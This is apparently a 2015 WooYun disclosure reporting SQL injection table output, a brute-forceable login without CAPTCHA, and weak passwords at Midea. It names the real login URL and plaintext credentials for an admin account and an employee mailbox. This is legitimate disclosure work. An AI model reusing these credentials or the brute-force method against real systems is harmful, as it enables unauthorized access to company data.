[11:16:34] [INFO] resumed: UPDATENAME
[11:16:34] [INFO] resumed: VARCHAR2
[11:16:34] [INFO] resumed: UPDATETIME
[11:16:34] [INFO] resumed: DATE
[11:16:34] [INFO] resumed: FD_ID
[11:16:34] [INFO] resumed: NUMBER
[11:16:34] [INFO] resumed: SEQUENCE_ID
[11:16:34] [INFO] resumed: NUMBER
[11:16:34] [INFO] resumed: EMAIL_SUBJECT
[11:16:34] [INFO] resumed: VARCHAR2
[11:16:34] [INFO] resumed: EMAIL_RECEIVER
[11:16:34] [INFO] resumed: VARCHAR2
[11:16:34] [INFO] resumed: OTHER_EMAIL
[11:16:34] [INFO] resumed: VARCHAR2
[11:16:34] [INFO] resumed: EMAIL_CONTENT
[11:16:34] [INFO] resumed: CLOB
[11:16:34] [INFO] resumed: EMAIL_FORMAT
[11:16:34] [INFO] resumed: VARCHAR2
[11:16:34] [INFO] resumed: EMAIL_SENDER
[11:16:34] [INFO] resumed: VARCHAR2
[11:16:34] [INFO] resumed: IS_BCC
[11:16:34] [INFO] resumed: NUMBER
[11:16:34] [INFO] resumed: PT_ID
[11:16:34] [INFO] resumed: VARCHAR2
[11:16:34] [INFO] resumed: UPLOAD_MIP_FLAG
[11:16:34] [INFO] resumed: NUMBER
[11:16:34] [INFO] resumed: SEND_FLAG
[11:16:34] [INFO] resumed: NUMBER
[11:16:34] [INFO] resumed: CREATEID
[11:16:34] [INFO] resumed: VARCHAR2


QQ截图20151211113845.png


0X02 某站弱口令
漏洞地址:

http://eng.midea.com.cn/AccountManager/Login?ReturnUrl=%2fContract%2fAlterDetails%2f2e47465d-e155-4d9f-9386-72b1b3a155c2


由于无验证码

协同管理外部平台.png


可爆破:

13800000000-123456.png


成功登录:

13800000000-123456登录成功.png


没想到还是管理员
泄露公司敏感数据:

200多用户.png


合同台账.png


另外被忽略的漏洞

 WooYun: 美的某员工邮箱弱口令 


yangyt Midea123
可泄露公司敏感文件,通讯录等

邮箱登录.png


内部文件.png


内部文件2.png


电话-邮箱-职位等.png


漏洞证明:

如上
昨天提交的

http://www.wooyun.org/bugs/wooyun-2015-0160269/trace/b03134ca0952158157208aef0185ff81

未通过 ,但是漏洞并未修复,请修复后公开

修复方案:

认真对待
漏洞打包提交,20rank不过分吧 谢谢

版权声明:转载请注明来源 心云@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2015-12-11 17:39

厂商回复:

三发大礼包收下了,谢谢!

最新状态:

暂无


漏洞评价:

评价

  1. 2015-12-11 18:16 | 心云 ( 普通白帽子 | Rank:184 漏洞数:57 | Rank:200 漏洞数:55 | Rank:300 漏洞数:70 ...)

    @midea.com 收下了要修复哦 有米有小礼物呀 挖洞不容易T_T